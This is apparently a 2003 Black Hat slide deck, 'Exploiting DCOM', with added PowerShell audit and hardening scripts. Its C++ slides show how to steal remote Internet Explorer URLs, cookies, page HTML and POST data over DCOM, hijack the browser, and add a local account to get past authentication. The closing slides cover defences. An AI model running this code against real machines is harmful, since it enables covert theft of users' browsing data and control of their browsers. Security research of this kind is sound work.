8/8/2019 Bh Win 03 Security Friday
1/86
Exploiting DCOM
Yoshiaki Komoriya
Hidenobu [email protected]
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstration
DCOM exploit prevention
Distributed COM
Application-level protocol for object-oriented remote procedure call.
Used to construct applications in a distributed computing environment.
DCOM is a seamless evolution of COM, according to Microsoft.
COM technology
Microsoft's component-oriented programming model.
Reusable programs can be developed by using COM.
COM model (diagram): a client program calls a COM component through its interface.
Distributed apps by using DCOM (diagram): the client program on the local PC reaches a COM component on a remote PC through DCOM over the network.
DCOM model (diagram): client program -> DCOM runtime on the local PC -> DCOM protocol over the network -> DCOM runtime on the remote PC -> COM component.
DCOM runtime
Installed by default: Windows XP, 2k (98, Me).
Not installed by default: Windows NT, but installed with other apps (e.g. IE).
DCOMCNFG.exe
DCOM Configuration Tool.
Shows the list of installed DCOM-enabled applications.
List of DCOM-enabled apps
Windows Built-in DCOM Apps
Internet Explorer
Windows media player
Windows Scripting Host
Sound recorder
WordPad
and more
Other Applications
Word
Excel
Outlook
PowerPoint
and more
COM components on Windows
Windows has many COM components.
They are registered under HKEY_CLASSES_ROOT\CLSID in the registry.
COM components in Registry
IEen
Original IE exploit tool.
Steals IE's data.
Hijacks IE.
Can be downloaded from www.securityfriday.com.
IEen (diagram): the local PC talks to IE on the remote PC through DCOM over the network. Stealing: browsing URLs, browsing contents and more. Hijacking: create new window, change browsing page and more.
Demonstration environment
Local PC: Windows XP
Remote PC: Windows 2k Professional (default settings)
Exploit code
Stealing IEs data
Hijacking IE
Stealing IE's data
Browsing URL lists
Incoming data
Cookies
HTML contents
Navigation events
Get parameters
Post Parameters
Browsing URL list
1. Activate the ShellWindows component on the remote PC.
2. Get IDispatch interfaces from the IShellWindows interface.
3. Get IWebBrowser2 interfaces from the IDispatch interfaces.
4. Get the browsing URL strings from IWebBrowser2.
Activate ShellWindows
#include <windows.h>
#include <exdisp.h>   // IShellWindows, IWebBrowser2, DWebBrowserEvents and their CLSIDs/IIDs (link with uuid.lib)
#include <mshtml.h>   // IHTMLDocument2, IHTMLElement (used on the following slides)

// Initialize COM runtime
HRESULT hret = CoInitialize(NULL);

// Create COSERVERINFO structure containing the remote PC name or IP
COSERVERINFO ServerInfo;
ServerInfo.dwReserved1 = 0;
ServerInfo.dwReserved2 = 0;
ServerInfo.pwszName = L"RemotePC";
ServerInfo.pAuthInfo = NULL;

// Get an IShellWindows interface from the remote PC
MULTI_QI qi = {&IID_IShellWindows, NULL, 0};
hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL,
                          CLSCTX_SERVER, &ServerInfo, 1, &qi);
IShellWindows *windows = (IShellWindows*)qi.pItf;
Get IDispatch
// Get the number of IE windows by using IShellWindows
long nCount;
hret = windows->get_Count(&nCount);
for(long i = 0; i < nCount; ++i){   // the loop body continues on the next slides
    // Get an IDispatch interface from IShellWindows
    IDispatch *disp = NULL;
    VARIANT va;
    VariantInit(&va);
    V_VT(&va) = VT_I4;
    V_I4(&va) = i;
    hret = windows->Item(va, &disp);
    VariantClear(&va);
Get IWebBrowser2
    // Get an IWebBrowser2 interface from the IDispatch
    IWebBrowser2 *browser = NULL;
    if(disp != NULL){
        hret = disp->QueryInterface(IID_IWebBrowser2, (void**)&browser);
    }
Get browsing URL strings
    // Get the browsing URL string
    if(browser != NULL){
        BSTR url;
        hret = browser->get_LocationName(&url);
    }
}   // end of the loop over IE windows
Incoming data
Cookie:
1. Get the IHTMLDocument2 interface from IWebBrowser2.
2. Call the get_cookie method of IHTMLDocument2.
HTML:
1. Get the IHTMLElement interface from IHTMLDocument2.
2. Call the get_outerHTML method of IHTMLElement.
Get cookie
    // Get IHTMLDocument2 from IWebBrowser2
    IDispatch *htmlDisp = NULL;
    hret = browser->get_Document(&htmlDisp);
    IHTMLDocument2 *doc = NULL;
    if(htmlDisp != NULL){
        hret = htmlDisp->QueryInterface(IID_IHTMLDocument2, (void**)&doc);
    }
    // Call get_cookie method of IHTMLDocument2
    if(doc != NULL){
        BSTR cookie;
        hret = doc->get_cookie(&cookie);
    }
Get HTML
    // Get the body IHTMLElement from IHTMLDocument2
    IHTMLElement *element = NULL;
    hret = doc->get_body(&element);
    // Call get_outerHTML of IHTMLElement
    if(element != NULL){
        BSTR html;
        hret = element->get_outerHTML(&html);
    }
Navigation events (diagram): IE sends its navigation events to the event handler inside the client program.
Navigation events
1. Create an event handler implementing the DWebBrowserEvents interface.
2. Get the IConnectionPoint interface through IWebBrowser2.
3. Advise IE where the event handler is by using IConnectionPoint.
Members of DWebBrowserEvents
BeforeNavigate
CommandStateChange
DownloadBegin
DownloadComplete
NavigateComplete
NewWindow
OnQuit
ProgressChange
PropertyChange
StatusTextChange
TitleChange
WindowActivate
WindowMove
WindowResize
BeforeNavigate
void BeforeNavigate(
    IDispatch* pDisp,
    VARIANT* &url,             // the new URL to be navigated to
    VARIANT* &Flag,
    VARIANT* &TargetFrameName,
    VARIANT* &PostData,        // the POST data to send to the new URL
    VARIANT* &Headers,
    VARIANT_BOOL* &Cancel
);
Get IConnectionPoint
IConnectionPointContainer* container;
hret = browser->QueryInterface(
    IID_IConnectionPointContainer, (void**)&container);
IConnectionPoint* point;
hret = container->FindConnectionPoint(
    DIID_DWebBrowserEvents,   // exdisp.h names the dispinterface IID with the DIID_ prefix
    &point);
Advise IE
Sink *sink = new Sink;   // the event handler class implementing DWebBrowserEvents
DWORD dwCookie;
hret = point->Advise(sink->GetIDispatch(false), &dwCookie);
Hijacking IE
Change browsing pages
Make IE windows invisible
Create new windows
Change browsing pages
BSTR newURL = SysAllocString(L"http://www.yahoo.co.jp");
// IWebBrowser2::Navigate takes the URL plus four optional VARIANT* arguments
hret = browser->Navigate(newURL, NULL, NULL, NULL, NULL);
SysFreeString(newURL);
Make IE windows invisible
browser->put_Visible(VARIANT_FALSE);
Create new windows
COSERVERINFO ServerInfo2;
ServerInfo2.dwReserved1 = 0;
ServerInfo2.dwReserved2 = 0;
ServerInfo2.pwszName = L"RemotePC";
ServerInfo2.pAuthInfo = NULL;
MULTI_QI qi2 = {&IID_IWebBrowser2, NULL, 0};
hret = CoCreateInstanceEx(CLSID_InternetExplorer, NULL,
                          CLSCTX_SERVER, &ServerInfo2, 1, &qi2);
IWebBrowser2 *browser2 = (IWebBrowser2*)qi2.pItf;
Authentication
Component activation procedures
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
Component activation procedure (sequence between the local PC and the remote PC)
1. NEGOTIATE
2. CHALLENGE
3. RESPONSE
4. CLSID
5. Results
Two steps of authentication (diagram): client program -> logon audit -> DCOM authentication -> component on the remote PC.
Logon audit 1/2 (diagram): the client program runs as Bill, while the remote PC only knows the accounts Mike, Zev and Joe, so Bill is rejected (X) at the logon audit before DCOM authentication is reached.
62/86
Logon audit 2/2
LogonAudit
DCOMAuthentication
Component
Remote PC
Joe
ClientProgram
MikeZev
Joe
DCOM authentication
Launch / Access control list: controls the launch / access permission.
RunAs parameter: the account used to launch / access components.
DCOM authentication (diagram): after the logon audit, the client program is checked against the component's ACL, and the component is run under the RunAs account on the remote PC.
Default setting of DCOM authentication
Launch / Access control list: SYSTEM, Administrators, INTERACTIVE
RunAs: The launching user
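As an added example (not from the original slides or from IEen), the following PowerShell reads the settings just described from the local registry: the machine-wide Launch / Access permissions and every per-application RunAs or permission override, so a defender can compare a host against the defaults the slide lists. The registry paths and value names are the documented DCOM ones; the function names and the report layout are this example's own. Run it in an elevated PowerShell.

```powershell
# Added audit script (not from the original slides): reports the DCOM
# Launch / Access ACLs and RunAs settings of the local machine.

function ConvertFrom-DcomPermission {
    # Decodes a REG_BINARY security descriptor (LaunchPermission or
    # AccessPermission) into "Account: AceType" strings.
    param([byte[]]$Bytes)
    if (-not $Bytes) { return @() }
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid.Value }          # unresolvable SID: keep the raw value
        '{0}: {1}' -f $name, $ace.AceType     # e.g. "NT AUTHORITY\INTERACTIVE: AccessAllowed"
    }
}

function Get-DcomPermissionReport {
    # Machine-wide defaults live under HKLM\SOFTWARE\Microsoft\Ole.
    $ole = 'HKLM:\SOFTWARE\Microsoft\Ole'
    $defaults = Get-ItemProperty -Path $ole -ErrorAction Stop
    $report = [ordered]@{
        EnableDCOM     = $defaults.EnableDCOM
        DefaultLaunch  = @(ConvertFrom-DcomPermission $defaults.DefaultLaunchPermission)
        DefaultAccess  = @(ConvertFrom-DcomPermission $defaults.DefaultAccessPermission)
        AppIdOverrides = @()
    }
    # Per-application overrides live under the AppID key: RunAs fixes the
    # account the server runs as; LaunchPermission / AccessPermission replace
    # the defaults for that application only.
    foreach ($key in Get-ChildItem 'HKLM:\SOFTWARE\Classes\AppID' -ErrorAction SilentlyContinue) {
        $p = Get-ItemProperty -Path $key.PSPath
        if ($p.RunAs -or $p.LaunchPermission -or $p.AccessPermission) {
            $report.AppIdOverrides += [pscustomobject]@{
                AppId  = $key.PSChildName
                Name   = $p.'(default)'
                RunAs  = $p.RunAs        # empty means "The launching user", the deck's default
                Launch = (ConvertFrom-DcomPermission $p.LaunchPermission) -join '; '
                Access = (ConvertFrom-DcomPermission $p.AccessPermission) -join '; '
            }
        }
    }
    [pscustomobject]$report
}

$r = Get-DcomPermissionReport
"EnableDCOM: $($r.EnableDCOM)"
"Default launch permission: $($r.DefaultLaunch -join '; ')"
"Default access permission: $($r.DefaultAccess -join '; ')"
$r.AppIdOverrides | Format-Table -AutoSize
```

The two default lists are the ones the slide summarizes as SYSTEM, Administrators, INTERACTIVE for Windows 2000; on a current Windows version they differ, and the per-AppID table is where a component that is launched under a fixed RunAs account or is reachable by a broader ACL than the default shows up.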
Event handling model (diagram): the component sends its navigation events to the event handler inside the client program.
Reverse authentication (diagram): to deliver an event, the component connects back to the event handler inside the client program, so the local PC now performs the logon audit and DCOM authentication against the remote side.
Exploit code
1. Set an account on the local PC.
2. Create the client process with the new account's security context.
1. Set account on local PC
#include <lm.h>   // USER_INFO_1, NetUserAdd; link with netapi32.lib

// Create USER_INFO_1 structure
USER_INFO_1 ui;
ui.usri1_name = USERNAME;
ui.usri1_password = PASSWORD;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;

// Add the new user to the system
NetUserAdd(NULL, 1, (LPBYTE)&ui, NULL);
2. Create client process
PROCESS_INFORMATION process;
STARTUPINFOW startup;
ZeroMemory(&startup, sizeof(startup));   // cb must be set before the call
startup.cb = sizeof(startup);
startup.dwFlags = STARTF_USESHOWWINDOW;
startup.wShowWindow = SW_SHOWNORMAL;
// USERNAME, PASSWORD, EXPLOIT.exe and CURRENTDIR are placeholders on the slide
CreateProcessWithLogonW(USERNAME, NULL, PASSWORD, 0,
                        NULL, EXPLOIT.exe, 0, NULL,
                        CURRENTDIR, &startup, &process);
Special case: XP
New security model.
Cannot exploit with XP default setting.
Special case: XP (diagram): under the XP default model, a remote user A is mapped to the guest account at the logon audit, and guest is not in the component's ACL, so DCOM authentication on the remote PC fails.
Use classic security model 1/2
Use classic security model 2/2
Trojan Office (diagram): the local PC talks to Office on the remote PC through DCOM over the network. Get the recent files list, open a document, change a document.
Demonstration environment
Local PC: Windows XP
Remote PC: Windows 2k Professional
DCOM exploit prevention
1. Filter port 135.
2. Disable DCOM.
3. Use a strong password or pass phrase.
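Added example (not from the original slides): a PowerShell check of the local host against the three preventions above, together with the ForceGuest setting behind the "Special case: XP" section. The cmdlets, registry paths and value names are documented Windows ones; Test-DcomHardening, its -Enforce switch and the report fields are this example's own assumptions. Run it in an elevated PowerShell.

```powershell
# Added hardening check (not from the original slides). Without -Enforce it
# only reports; with -Enforce it applies preventions 1 and 2.

function Test-DcomHardening {
    param([switch]$Enforce)   # assumption of this example: only -Enforce changes anything

    $ole = 'HKLM:\SOFTWARE\Microsoft\Ole'
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # 2. Disable DCOM: EnableDCOM = "N" switches off remote activation system-wide.
    $enableDcom   = (Get-ItemProperty -Path $ole -Name EnableDCOM -ErrorAction SilentlyContinue).EnableDCOM
    $dcomDisabled = ($enableDcom -eq 'N')

    # 1. Filter port 135: is the RPC endpoint mapper listening, and is there an
    #    enabled inbound block rule naming TCP port 135 (exact port only, ranges are not matched)?
    $listening = [bool](Get-NetTCPConnection -LocalPort 135 -State Listen -ErrorAction SilentlyContinue)
    $blockRule = Get-NetFirewallRule -Direction Inbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
                 Where-Object {
                     $pf = $_ | Get-NetFirewallPortFilter
                     $pf.Protocol -eq 'TCP' -and ($pf.LocalPort -contains '135')
                 }
    $filtered = [bool]$blockRule

    # Special case XP: ForceGuest = 1 is the "Guest only" model (remote logons are
    # mapped to Guest, so the DCOM ACL check fails); 0 is the classic model.
    $forceGuest = (Get-ItemProperty -Path $lsa -Name ForceGuest -ErrorAction SilentlyContinue).ForceGuest

    if ($Enforce) {
        if (-not $dcomDisabled) {
            Set-ItemProperty -Path $ole -Name EnableDCOM -Value 'N'
        }
        if (-not $filtered) {
            New-NetFirewallRule -DisplayName 'Block inbound RPC endpoint mapper (TCP 135)' `
                -Direction Inbound -Protocol TCP -LocalPort 135 -Action Block | Out-Null
        }
    }

    # 3. Strong password: the password itself cannot be read back, so report
    #    the local minimum-length policy from "net accounts" instead.
    $minLen = ((net accounts) -match 'Minimum password length') -replace '.*:\s*', ''

    [pscustomobject]@{
        Port135Listening  = $listening
        Port135Blocked    = $filtered
        DcomDisabled      = $dcomDisabled
        ForceGuest        = $forceGuest      # empty on hosts that never had the value
        MinPasswordLength = $minLen
    }
}

Test-DcomHardening
```

Both enforced changes also cut off every legitimate RPC and DCOM client of the host, remote management included, so run the reporting mode first and test -Enforce on a non-production machine. The EnableDCOM value and the firewall rule are re-read on the next run, so the same function serves as the check after the change.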
Conclusion
Revealed the risks of DCOM with exploit demonstrations.
Showed the DCOM exploit techniques.
Explained how to defend ourselves.
FAQ
Q: IEen doesn't work well in a domain environment.
A: The latest version of IEen works.
Q: Why is the alert message displayed when the "Contents" box is clicked?
A: The system sometimes goes down. I think the get_outerHTML method has a memory leak, even if I use SysFreeString every time.
Q: Connection fails with a "Class not registered" message.
A: Check the user name and password.
Reference
DCOM Technical Overview: http://msdn.microsoft.com/library/en-us/dndcom/html/msdn_dcomtec.asp
WebBrowser Control: http://msdn.microsoft.com/workshop/browser/webbrowser/reflist_cpp.asp
ShellWindows Object: http://msdn.microsoft.com/library/en-us/shellcc/platform/shell/reference/objects/shellwindows/shellwindows.asp
and others.